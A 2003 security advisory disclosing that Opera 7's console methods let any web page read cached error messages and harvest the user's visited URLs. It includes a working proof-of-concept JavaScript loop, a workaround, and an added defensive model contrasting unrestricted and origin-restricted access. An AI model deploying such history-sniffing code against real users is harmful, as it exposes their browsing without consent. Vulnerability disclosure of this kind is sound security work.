GreyMagic Security Advisory GM#006-OP
By GreyMagic Software, Israel. 04 Feb 2003.
Topic: Sniffing Opera's Tracks.
Discovery date: 29 Jan 2003.
Affected applications: Opera 7 (final).
Introduction: Opera recently released a new version of its browser.
The new browser features a very useful Javascript console, which uses a few methods Opera implemented in the "opera" object.
Discussion: These methods appear in the comments of the "console.html" file as follows:
- opera.errorIndex()
  Returns the index of the last error message. This index is monotonically increasing (which limits us to about 2^53 errors per Opera session).
- opera.errorMessage(i)
  Returns the error message at index i. The value returned may be #f, if that message has been flushed from the cache.
Opera hadn't bothered to restrict these methods to certain credentials and they are available for any web page to use. At first glance this doesn't appear to be a big deal, but a short inspection of the generated error messages reveals that each of them contains the URL that threw the exception.
In practice, this means that a web page can extract a list of all URLs the user had visited and that threw any exceptions. And since Opera pretends to be Internet Explorer by default, it often encounters errors in web pages. Harvesting visited URLs had never been this simple.
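Exploit: The following code will generate a list of visited URLs:
// Walk every cached error message and pull out the URL embedded in it.
var sMsg,
    sFinal="",
    iLen=opera.errorIndex();
for (var iErr=0;iErr<iLen;iErr++) {
    sMsg=opera.errorMessage(iErr);
    // errorMessage() may return a false value for entries flushed from the cache.
    if (sMsg && /(https?:\/\/\S+)/i.test(sMsg)) sFinal+=RegExp.$1+"\n";
}
alert(sFinal);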
Solution:
Until a patch becomes available, disable JavaScript by going to File -> Preferences -> Multimedia and unchecking the "Enable JavaScript" item.
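The root cause discussed above is a browser-wide error cache that any page can read. The following is an added example, not code from the advisory or from Opera: a constructed model that contrasts the unrestricted accessors with a view bound to the caller's origin. ErrorCache, CONSOLE_ORIGIN and the sample URLs are hypothetical.

```javascript
// Constructed model of a browser-wide script error cache; not Opera's code.
// ErrorCache, CONSOLE_ORIGIN and the sample URLs are hypothetical.
const CONSOLE_ORIGIN = "opera:console"; // assumed id of the trusted console page

class ErrorCache {
  constructor() { this.entries = []; }

  // Engine-side hook: the failing page's URL is stored inside the message text.
  record(pageUrl, text) {
    const origin = new URL(pageUrl).origin;
    this.entries.push({ origin, message: `${text} (${pageUrl})` });
  }

  // Behaviour the advisory describes: every caller reads the global cache.
  unrestricted() { return this.api(() => this.entries); }

  // Restricted view: the console sees everything, a page only its own origin.
  viewFor(callerOrigin) {
    return this.api(() => callerOrigin === CONSOLE_ORIGIN
      ? this.entries
      : this.entries.filter((e) => e.origin === callerOrigin));
  }

  api(visible) {
    return {
      errorIndex: () => visible().length,
      errorMessage: (i) => { const e = visible()[i]; return e ? e.message : false; },
    };
  }
}

// Same loop shape as the advisory's code, used to measure what a caller can see.
function visibleUrls(api) {
  const urls = [];
  for (let i = 0; i < api.errorIndex(); i++) {
    const msg = api.errorMessage(i);
    const hit = msg && /(https?:\/\/[^\s)]+)/i.exec(msg);
    if (hit) urls.push(hit[1]);
  }
  return urls;
}

const cache = new ErrorCache();
cache.record("https://bank.example/account?id=7", "TypeError: x is undefined");
cache.record("https://mail.example/inbox", "ReferenceError: foo is not defined");
cache.record("https://untrusted.example/page", "SyntaxError: unexpected token");

console.log(visibleUrls(cache.unrestricted()).length);
console.log(visibleUrls(cache.viewFor("https://untrusted.example")));
```

In the restricted view errorIndex() is also computed per origin, so the counter itself does not reveal how many errors other sites raised.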
Tested on:
Opera 7 NT4.
Opera 7 Win98.
Opera 7 Win2000.
Opera 7 WinXP.
The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.
Vulnerability details are provided strictly for educational and defensive purposes.
GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
